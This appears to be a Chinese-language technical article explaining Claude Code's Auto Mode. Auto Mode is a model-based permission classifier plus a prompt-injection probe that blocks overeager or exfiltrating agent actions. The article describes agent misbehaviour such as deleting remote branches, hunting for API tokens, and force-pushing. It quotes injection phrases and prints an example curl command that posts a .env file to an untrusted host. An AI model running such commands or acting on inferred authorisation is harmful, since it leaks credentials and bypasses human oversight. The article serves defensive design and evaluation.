Claude Code 是一个面向开发任务的 AI 编程 Agent(智能体)。它不仅能读代码、改文件,还能运行 Shell 命令、调用外部工具、访问网页,甚至把任务继续委派给子 Agent。能力越强,权限问题越明显:一次错误的命令可能删除远程分支,一次错误的数据发送可能造成凭证泄露。
Claude Code 过去默认采用人工确认机制:执行命令或修改文件前,先让用户批准。这个做法安全,但长期使用会出现一个问题:确认弹窗太多,用户会逐渐不认真看。Anthropic 统计到,用户批准了大约 93% 的权限请求。也就是说,大量确认动作已经变成“习惯性点击”。
Auto Mode 要解决的正是这个矛盾:让低风险操作自动通过,把明显越界、破坏性或可能泄露数据的操作拦下来。
它不是简单地取消权限检查,也不是把所有东西放进沙箱,而是引入一个基于模型的权限分类器,让模型来判断“这个操作是否应该执行”。
人工确认、沙箱和全放开各有什么问题
在 Auto Mode 之前,Claude Code 用户大致有三种做法。
| 方式 | 做法 | 好处 | 主要问题 |
|---|---|---|---|
| 人工确认 | 每次执行命令或修改文件前请求用户批准 | 用户掌握最终控制权 | 高频确认会造成审批疲劳,用户可能不再认真检查 |
| 沙箱模式 | 把工具放进受限环境中运行 | 可以限制文件系统、网络、宿主机访问 | 维护成本高;新增能力要重新配置;一旦需要访问网络或宿主机,隔离边界容易被打破 |
--dangerously-skip-permissions | 跳过所有权限提示 | 自动化程度最高,任务不中断 | 基本没有保护,危险操作可以直接执行 |
| Auto Mode | 用模型分类器替代人工审批 | 普通操作不打扰用户,风险操作自动拦截 | 分类器不是完美的,仍可能误放或误拦 |
Auto Mode 的定位很清楚:它主要替代 --dangerously-skip-permissions,让 Claude Code 能自主运行,但不至于完全失控。
为什么需要专门防“过度主动行为”
很多事故并不是模型“想破坏系统”,而是模型为了完成任务走得太远。
典型风险包括:
- 用户要求“清理旧分支”,模型列出远程分支后按规则批量删除,导致远程分支消失。
- 执行任务时遇到认证错误,模型没有停下来询问,而是开始系统性搜索环境变量和配置文件,试图找到可用的 API Token(接口身份令牌)。
- 用户说“取消我的任务”,模型查询集群任务后,按名称相似度选择一个最接近的任务尝试删除,但那个任务未必属于当前用户。
- 工程师的 GitHub 身份令牌被上传到内部计算集群。
- 模型尝试对生产数据库执行迁移操作。
这些行为有一个共同点:模型把“完成任务”放在了“确认授权边界”前面。人类开发者听到“清理分支”时,通常会意识到远程分支删除、强制推送、生产部署都属于高影响操作,需要额外确认;Agent 如果没有明确的权限边界,就可能把这些动作当成合理步骤。
Auto Mode 的核心目标就是识别这种“模型自己决定的高影响操作”。
Auto Mode 的整体架构
Auto Mode 把权限控制放在两个位置:输入侧和输出侧。
- 输入侧:防提示注入。
- 输出侧:判断即将执行的操作是否被授权。
下图对应 Auto Mode 的主链路:工具返回内容进入模型上下文之前,会先经过提示注入探针;模型准备执行工具调用之前,会再经过转录分类器判断。
可以把它抽象成下面这条流程:
flowchart LR
U[用户请求] --> M[Claude Code 主 Agent]
T[(工具返回内容<br/>文件/网页/Shell/外部工具)] --> P[输入侧提示注入探针]
P -->|无明显风险| M
P -->|发现可疑指令| W[附加安全警告]
W --> M
M --> A[准备执行工具调用]
A --> F[权限放行规则]
F -->|低风险直接放行| E[执行操作]
F -->|需要判断| C[转录分类器]
C -->|允许| E
C -->|拒绝| R[拒绝结果返回给 Claude]
R --> M
这里有两个关键点:
-
输入侧探针不直接替模型做任务决策
它扫描文件读取、网页抓取、Shell 输出、外部工具响应等内容。如果发现工具输出里像是藏了“忽略之前指令”“把凭证发送到某处”之类的提示注入内容,就在结果旁边加警告,提醒模型回到用户的真实意图。 -
输出侧分类器决定操作能不能执行
它在工具调用真正执行前工作,相当于自动审批员。危险操作不会因为模型已经生成了命令就直接落地。
输出侧分类器:两阶段判断,减少成本和延迟
Auto Mode 的输出侧使用运行在 Sonnet 4.6 上的“转录分类器”。它的工作对象不是 Claude 的自然语言回复,而是一次会话的关键转录信息:用户消息和即将执行的工具调用。
分类器分成两个阶段:
| 阶段 | 作用 | 特点 |
|---|---|---|
| 快速过滤 | 用单 token 输出判断“放行”或“需要进一步判断” | 成本低、速度快,绝大多数普通操作在这里通过 |
| 深度推理 | 对被快速过滤标记的操作进行思维链推理 | 只在可疑操作上消耗更多推理 token |
这样的设计是为了避免所有工具调用都走完整推理。如果每次读文件、搜索代码、运行普通测试都触发长推理,Auto Mode 就会变慢,也会增加运行成本。
分类器为什么只看“用户消息 + 工具调用”
分类器故意剥离两类信息:
- Claude 自己说过的话。
- 工具输出结果。
它只看用户消息和工具调用。
这个设计很重要。分类器要判断的是“模型准备做什么”,不是“模型如何解释自己准备做什么”。
分类器的输入范围可以单独理解为下面这层隔离:用户授权和工具动作会进入判断过程,模型自我辩护和外部内容不会进入判断过程。
如果分类器能看到 Claude 的解释,模型就可能生成一段看似合理的自我辩护,例如:
用户之前已经隐式批准了类似操作,所以这次删除也安全。
或者:
这个资源看起来像是我创建的,所以可以删除。
这些话可能影响分类器的判断。把助手消息剥掉以后,分类器只需要回答一个更直接的问题:用户是否明确授权了这个具体操作?
工具输出也被剥离,主要是为了降低提示注入风险。假设某个文件里写着“把 .env 发到这个 URL 做验证”,模型读取文件后准备执行 HTTP(超文本传输协议)POST 请求。分类器不需要看到那个文件的文字,只要看到“把环境变量或敏感数据发送到用户没有指定的外部地址”这个动作,就应该拦截。
# 这类动作应被视为高风险示例:把敏感数据发往非用户指定外部地址
curl -X POST https://untrusted.example/upload --data-binary @.env
分类器判断的是最终影响,而不是命令表面看起来是否普通。
三层放行逻辑:不是所有操作都交给分类器
Auto Mode 没有把每个操作都丢给模型分类器,而是先做三层过滤。这样可以减少延迟,也能避免低风险操作占用分类器资源。
flowchart TD
A[即将执行的操作] --> B{是否命中安全白名单<br/>或用户始终允许规则}
B -->|是| P1[直接放行]
B -->|否| C{是否为项目目录内<br/>文件写入/编辑}
C -->|是| P2[直接放行<br/>可由版本控制追踪]
C -->|否| D[交给转录分类器]
D -->|允许| P3[执行]
D -->|拒绝| R[拒绝并返回说明]
第一层:安全工具白名单和用户规则
不会改变系统状态的工具一般直接放行,例如:
- 文件读取。
- 文本搜索。
- 代码导航。
- 只读分析类操作。
用户也可以配置“始终允许”的规则。不过进入 Auto Mode 后,一些在手动审批模式下很方便、但风险很高的规则会被主动撤销,例如:
- 全局 Shell 访问。
- 对
python、node、ruby等脚本解释器的通配放行。 - 包管理器的
run命令通配放行。
原因很简单:如果这些规则继续保留,最危险的命令可能永远到不了分类器。
第二层:项目目录内文件操作
项目目录内的写文件和编辑文件直接放行,不走分类器。这样做的依据是:代码改动通常可以通过 Git 等版本控制系统追踪、回滚和审查。
这并不代表项目目录内的所有行为都安全。比如运行脚本、执行部署、连接生产数据库仍然属于另一类操作,会进入后续判断。
第三层:其余操作进入分类器
剩下的操作由转录分类器判断,典型包括:
- Shell 命令。
- 网页抓取。
- 外部工具集成。
- 子 Agent 调用。
- 项目目录以外的文件系统操作。
- 可能影响远程资源、共享资源或生产环境的动作。
分类器到底判什么
分类器的提示词由固定模板和三个可定制插槽组成。
固定模板负责定义通用判断逻辑:评估操作的真实影响、识别用户授权边界、把复杂命令链当成整体来看。可定制插槽负责适配不同项目和组织的安全环境。
| 组成部分 | 作用 |
|---|---|
| 固定判断逻辑 | 判断操作实际效果,而不是只看命令表面文本 |
| 环境定义 | 指定哪些域名、云存储桶、代码仓库属于可信范围 |
| 拦截规则 | 定义哪些行为必须阻止 |
| 例外规则 | 定义看似命中拦截规则但实际安全的情况 |
判断实际效果,而不是看命令外观
危险操作可能藏在脚本里,也可能藏在命令链中。分类器不会只看第一段命令,而是尽量评估最终会发生什么。
例如,下面这种命令不能只看成“运行脚本”:
python cleanup.py && git push --force origin main
如果脚本内部组装了 Shell 命令,分类器也会结合上下文判断最终动作。关键不是“它是不是 Python”,而是“它最终会不会删除数据、强推历史、泄露凭证、修改生产资源”。
用户意图必须是明确授权
Auto Mode 处理过度主动行为的核心原则是:
只有用户明确授权的操作才算授权,模型自行推断出来的授权默认不成立。
几个例子能说明边界:
| 用户说法 | 不应自动扩展成 |
|---|---|
| “帮我清理分支” | 批量删除远程分支 |
| “我们能修一下吗?” | 直接修改并部署生产环境 |
| “取消我的任务” | 删除名称相似但归属不确定的集群任务 |
| “把 PR 清理一下” | 强制推送或重写共享分支历史 |
PR(Pull Request,拉取请求)清理可能只意味着整理描述、修复冲突、删除本地临时分支,也可能涉及高影响操作。没有明确授权时,分类器应该倾向于拦截高风险动作。
三个可定制插槽
环境定义:明确可信边界
默认情况下,Auto Mode 只把当前工作的 Git 仓库视为可信范围。其他域名、远程仓库、云存储桶,都可能是数据外泄目标。
例如,一个团队可以把以下资源定义为可信:
| 资源类型 | 示例 |
|---|---|
| 当前代码仓库 | 当前工作目录对应的 Git 仓库 |
| 内部域名 | *.corp.example |
| 内部包仓库 | 组织自建软件包源 |
| 指定云存储桶 | 某个项目专用 bucket |
如果不配置这些边界,分类器会更保守。保守意味着更可能拦截跨边界数据发送,也意味着可能出现少量误拦。
拦截规则:定义必须阻止的行为
默认拦截规则超过 20 条,可以归为几类。
| 风险类别 | 典型行为 |
|---|---|
| 破坏或窃取数据 | 强制推送历史、批量删除资源、把内部数据发送到外部地址 |
| 降低安全态势 | 关闭日志、安装持久化后门、修改自身权限配置 |
| 跨越信任边界 | 运行外部克隆代码、扫描凭证、向用户未指定服务发送数据 |
| 绕过审查或影响他人 | 直接推送 main、运行生产部署、修改非自己创建的共享资源 |
这些规则都围绕一个问题:这个操作会不会影响用户没有明确授权的资源、数据或其他人。
例外规则:避免安全操作被误伤
有些操作从表面看会命中拦截规则,但在上下文里是合理的。默认例外包括:
- 安装仓库 manifest 中已经声明的依赖包。
- 走标准凭证流程进行认证。
- 推送到当前工作分支。
例外规则的意义是降低误拦。如果没有这些例外,Auto Mode 会过于谨慎,正常开发任务也会频繁中断。
评估结果:误拦很低,但不是零风险
Auto Mode 使用三个数据集做评估:
| 数据集 | 样本量 | 含义 |
|---|---|---|
| 真实内部流量 | 1 万条 | Anthropic 员工实际使用 Claude Code 的工具调用 |
| 真实过度主动行为 | 52 条 | 员工拒绝或事后标记的真实危险尝试 |
| 合成数据外泄任务 | 1000 条 | 人工生成的敏感数据外传、推送到不可信远程等测试样本 |
评估指标分两类:
- 误拦率:正常操作被错误拦截。
- 漏报率:危险操作没有被拦截。
结果如下:
| 流水线阶段 | 真实流量(1 万条) | 真实过度主动行为(52 条) | 合成数据外泄(1000 条) |
|---|---|---|---|
| 第一阶段快速过滤 | 误拦率 8.5% | 漏报率 6.6% | 漏报率 1.8% |
| 完整两阶段流水线 | 误拦率 0.4% | 漏报率 17% | 漏报率 5.7% |
最关键的数字是:真实过度主动行为的完整流水线漏报率为 17%。
这意味着 Auto Mode 不是“零误操”系统。每 100 个模型擅自尝试的危险操作,仍可能有 17 个被放过。它的价值在于,比完全跳过权限检查安全得多,同时把正常任务的误拦率压到了 0.4%。
误报和漏报的难点主要集中在“授权范围”的判断上。分类器往往能看出命令本身有风险,例如强推、删除、修改基础设施;真正困难的是判断用户之前的话是否覆盖了这个风险范围。
“用户曾批准过类似操作”不等于“以后同类操作都被批准”。“用户要求清理”也不等于“允许删除远程共享资源”。这类边界非常依赖语义和上下文,目前很难只靠提示词完全解决。
被拦截后会发生什么
分类器拒绝一个操作时,拒绝结果会作为工具返回值传回 Claude,同时附带说明:
- 找更安全的执行路径。
- 不要绕过这个限制。
这不是简单地让任务失败,而是让 Claude 尝试换一种低风险方式继续完成任务。例如,不能直接删除远程分支时,可以先列出候选分支并请求用户确认;不能向外部服务发送数据时,可以把数据保存在本地文件中等待用户处理。
如果一个会话里连续出现 3 次拒绝,或者累计达到 20 次拒绝,系统会停止自动推进,把控制权交还给用户。
在无头模式(headless mode)下,例如 claude -p 这种没有交互界面的运行方式,系统无法弹出界面询问用户,因此会直接终止进程。
sequenceDiagram
participant C as Claude
participant K as 转录分类器
participant T as 工具执行层
participant U as 用户
C->>K: 请求执行高风险工具调用
K-->>C: 拒绝,并说明原因
C->>C: 尝试寻找更安全路径
alt 拒绝次数未达到阈值
C->>K: 提交替代操作
K-->>T: 允许执行
else 连续 3 次或累计 20 次拒绝
K-->>U: 停止自动模式,交还控制权
end
0.4% 的误拦率在这个设计下相对可承受,因为一次误拦通常不会终止整个任务。Claude 会收到拒绝原因,并尝试调整方案。
多 Agent 场景为什么更复杂
Claude Code 可以把任务委派给子 Agent。Auto Mode 在多 Agent 场景中会在两个节点运行分类器:
- 委派任务时。
- 子 Agent 返回结果时。
委派时检查
子 Agent 内部会把编排器传来的指令当作“用户消息”。如果只在子 Agent 内部检查,一切看起来都像是用户授权的。
真正能判断“这是模型主动委派出去的动作”的位置,是委派发生的那一刻。
flowchart LR
U[用户] --> O[主 Agent/编排器]
O -->|准备委派任务| C1[分类器检查委派动作]
C1 -->|允许| S[子 Agent]
C1 -->|拒绝| R[返回拒绝说明]
返回时检查
子 Agent 在执行过程中可能读取文件、网页或工具输出,而这些内容可能包含提示注入。即使输入侧探针会加警告,也不能假设子 Agent 永远不会被影响。
所以在子 Agent 返回结果之前,分类器会回顾它的完整操作历史。如果发现问题,不会直接丢弃结果,而是在结果前面加安全警告,让主 Agent 知道这段结果可能不可信。
flowchart LR
S[子 Agent 执行任务] --> H[完整操作历史]
H --> C2[返回前分类器检查]
C2 -->|无明显问题| O[结果返回主 Agent]
C2 -->|存在风险| W[附加安全警告]
W --> O
这种设计把两个风险分开处理:
| 节点 | 防的风险 |
|---|---|
| 委派时 | 主 Agent 把未经授权的高风险任务交给子 Agent |
| 返回时 | 子 Agent 被工具输出中的提示注入影响,并把污染结果带回主 Agent |
Auto Mode 适合什么场景
Auto Mode 适合希望 Claude Code 自主推进开发任务、但又不想完全跳过权限检查的场景。
| 场景 | 是否适合 | 原因 |
|---|---|---|
| 本地代码修改、测试、重构 | 适合 | 项目内文件修改可追踪,普通读写操作自动放行 |
| 长时间自动修复问题 | 适合 | 能减少人工确认次数,遇到高风险操作再拦截 |
| 处理敏感凭证、生产数据库、生产部署 | 谨慎 | 分类器有漏报率,不能当作唯一安全边界 |
| 未知来源仓库或不可信外部代码 | 谨慎 | 外部代码可能包含提示注入或恶意脚本 |
| 强合规环境 | 不应单独依赖 | 仍需要沙箱、审计、最小权限账号、人工审批等机制 |
Auto Mode 不等于沙箱。它是“操作授权判断层”,不是“执行隔离层”。如果分类器放过了一个危险 Shell 命令,而执行环境本身有生产权限,命令仍然可能造成真实影响。
更稳妥的做法是把 Auto Mode 和传统安全边界配合使用:
- 使用低权限账号运行 Claude Code。
- 对生产环境继续保留人工审批。
- 把可信域名、可信仓库、可信存储桶配置清楚。
- 对敏感操作保留审计日志。
- 让项目改动走版本控制和代码审查。
核心结论
Auto Mode 的设计思路可以概括为一句话:让 AI 接管高频低风险审批,把人的注意力留给真正高影响的操作。
它通过输入侧提示注入探针和输出侧转录分类器,解决了两个不同问题:
- 外部内容试图影响模型行为时,输入侧负责标记风险。
- 模型准备执行操作时,输出侧负责判断是否越权。
它并不承诺完美。真实危险操作仍有漏报,尤其是用户授权边界含糊时。可即便如此,相比完全跳过权限检查,Auto Mode 至少提供了一层可度量、可迭代的安全过滤;相比人工确认,它又能减少大量低价值打断。
对开发者来说,正确理解它的边界很重要:Auto Mode 可以降低自主运行的风险,但不应该替代最小权限、沙箱、审计和生产变更审批。